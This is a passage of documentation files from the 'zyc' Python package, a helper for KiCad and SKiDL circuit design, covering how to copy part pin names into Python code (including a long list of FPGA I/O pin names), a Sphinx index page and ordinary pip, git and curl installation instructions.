"GP0",
"VSS",
"GP3"
```
Now you can use the strings to connect the microcontroller pins to various nets:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
uc["VDD", "VSS"] += Net('VCC'), Net('GND')
uc["GP0", "GP1", "GP2", "GP3"] += Bus('GP', 4)
```
`zyc` lets you double-click on any table column header to re-sort the table
based on the contents of that column.
This can be useful in grouping pins by their names, functions, or part units
before selecting and pasting them.
Using an FPGA as an example, double-clicking the `Unit` column (1)
orders the table so you can select all the I/O pins in one of its banks (2).

Then the pins can be pasted:
```python
"IO_0_14",
"IO_0_15",
"IO_25_14",
"IO_25_15",
"IO_L1N_T0_AD0N_15",
"IO_L1N_T0_D01_DIN_14",
"IO_L1P_T0_AD0P_15",
"IO_L1P_T0_D00_MOSI_14",
"IO_L2N_T0_AD8N_15",
"IO_L2N_T0_D03_14",
"IO_L2P_T0_AD8P_15",
"IO_L2P_T0_D02_14",
"IO_L3N_T0_DQS_AD1N_15",
"IO_L3N_T0_DQS_EMCCLK_14",
"IO_L3P_T0_DQS_AD1P_15",
"IO_L3P_T0_DQS_PUDC_B_14",
"IO_L4N_T0_15",
"IO_L4N_T0_D05_14",
"IO_L4P_T0_15",
"IO_L4P_T0_D04_14",
"IO_L5N_T0_AD9N_15",
"IO_L5N_T0_D07_14",
"IO_L5P_T0_AD9P_15",
"IO_L5P_T0_D06_14",
"IO_L6N_T0_D08_VREF_14",
"IO_L6N_T0_VREF_15",
"IO_L6P_T0_15",
"IO_L6P_T0_FCS_B_14",
"IO_L7N_T1_AD2N_15",
"IO_L7N_T1_D10_14",
"IO_L7P_T1_AD2P_15",
"IO_L7P_T1_D09_14",
"IO_L8N_T1_AD10N_15",
"IO_L8N_T1_D12_14",
"IO_L8P_T1_AD10P_15",
"IO_L8P_T1_D11_14",
"IO_L9N_T1_DQS_AD3N_15",
"IO_L9N_T1_DQS_D13_14",
"IO_L9P_T1_DQS_14",
"IO_L9P_T1_DQS_AD3P_15",
"IO_L10N_T1_AD11N_15",
"IO_L10N_T1_D15_14",
"IO_L10P_T1_AD11P_15",
"IO_L10P_T1_D14_14",
"IO_L11N_T1_SRCC_14",
"IO_L11N_T1_SRCC_15",
"IO_L11P_T1_SRCC_14",
"IO_L11P_T1_SRCC_15",
"IO_L12N_T1_MRCC_14",
"IO_L12N_T1_MRCC_15",
"IO_L12P_T1_MRCC_14",
"IO_L12P_T1_MRCC_15",
"IO_L13N_T2_MRCC_14",
"IO_L13N_T2_MRCC_15",
"IO_L13P_T2_MRCC_14",
"IO_L13P_T2_MRCC_15",
"IO_L14N_T2_SRCC_14",
"IO_L14N_T2_SRCC_15",
"IO_L14P_T2_SRCC_14",
"IO_L14P_T2_SRCC_15",
"IO_L15N_T2_DQS_ADV_B_15",
"IO_L15N_T2_DQS_DOUT_CSO_B_14",
"IO_L15P_T2_DQS_15",
"IO_L15P_T2_DQS_RDWR_B_14",
"IO_L16N_T2_A15_D31_14",
"IO_L16N_T2_A27_15",
"IO_L16P_T2_A28_15",
"IO_L16P_T2_CSI_B_14",
"IO_L17N_T2_A13_D29_14",
"IO_L17N_T2_A25_15",
"IO_L17P_T2_A14_D30_14",
"IO_L17P_T2_A26_15",
"IO_L18N_T2_A11_D27_14",
"IO_L18N_T2_A23_15",
"IO_L18P_T2_A12_D28_14",
"IO_L18P_T2_A24_15",
"IO_L19N_T3_A09_D25_VREF_14",
"IO_L19N_T3_A21_VREF_15",
"IO_L19P_T3_A10_D26_14",
"IO_L19P_T3_A22_15",
"IO_L20N_T3_A07_D23_14",
"IO_L20N_T3_A19_15",
"IO_L20P_T3_A08_D24_14",
"IO_L20P_T3_A20_15",
"IO_L21N_T3_DQS_A06_D22_14",
"IO_L21N_T3_DQS_A18_15",
"IO_L21P_T3_DQS_14",
"IO_L21P_T3_DQS_15",
"IO_L22N_T3_A04_D20_14",
"IO_L22N_T3_A16_15",
"IO_L22P_T3_A05_D21_14",
"IO_L22P_T3_A17_15",
"IO_L23N_T3_A02_D18_14",
"IO_L23N_T3_FWE_B_15",
"IO_L23P_T3_A03_D19_14",
"IO_L23P_T3_FOE_B_15",
"IO_L24N_T3_A00_D16_14",
"IO_L24N_T3_RS0_15",
"IO_L24P_T3_A01_D17_14",
"IO_L24P_T3_RS1_15"
```
This is definitely something that would be difficult to type manually without making a mistake!
`zyc` requires minimal setup.
By default, it will use the `KICAD_SYMBOL_DIR` environment variable to look for part libraries,
and it will look for the global footprint library table (`fp_lib_table`) in the default location
where KiCad installs it on various OSes.
You can also add or change the directories that are searched for part libraries (1) or for
`fp_lib_table` files (2) using the menu items below:

It may happen that you change some part libraries or add more footprint files while `zyc` is
running. If so, you'll want to refresh the part and footprint caches (3).
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/usage.md
|
usage.md
|
.. include:: ../AUTHORS.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/authors.rst
|
authors.rst
|
Welcome to zyc's documentation!
======================================
.. toctree::
:maxdepth: 2
:caption: Contents:
readme
installation
usage
modules
contributing
authors
history
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/index.rst
|
index.rst
|
.. highlight:: shell
============
Installation
============
Stable release
--------------
To install zyc, run this command in your terminal:
.. code-block:: console
$ pip install zyc
This is the preferred method to install zyc, as it will always install the most recent stable release.
If you don't have `pip`_ installed, this `Python installation guide`_ can guide
you through the process.
.. _pip: https://pip.pypa.io
.. _Python installation guide: http://docs.python-guide.org/en/latest/starting/installation/
From sources
------------
The sources for zyc can be downloaded from the `Github repo`_.
You can either clone the public repository:
.. code-block:: console
$ git clone git://github.com/devbisme/zyc
Or download the `tarball`_:
.. code-block:: console
$ curl -OL https://github.com/devbisme/zyc/tarball/master
Once you have a copy of the source, you can install it with:
.. code-block:: console
$ python setup.py install
.. _Github repo: https://github.com/devbisme/zyc
.. _tarball: https://github.com/devbisme/zyc/tarball/master
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/installation.rst
|
installation.rst
|
.. include:: ../README.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/readme.rst
|
readme.rst
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.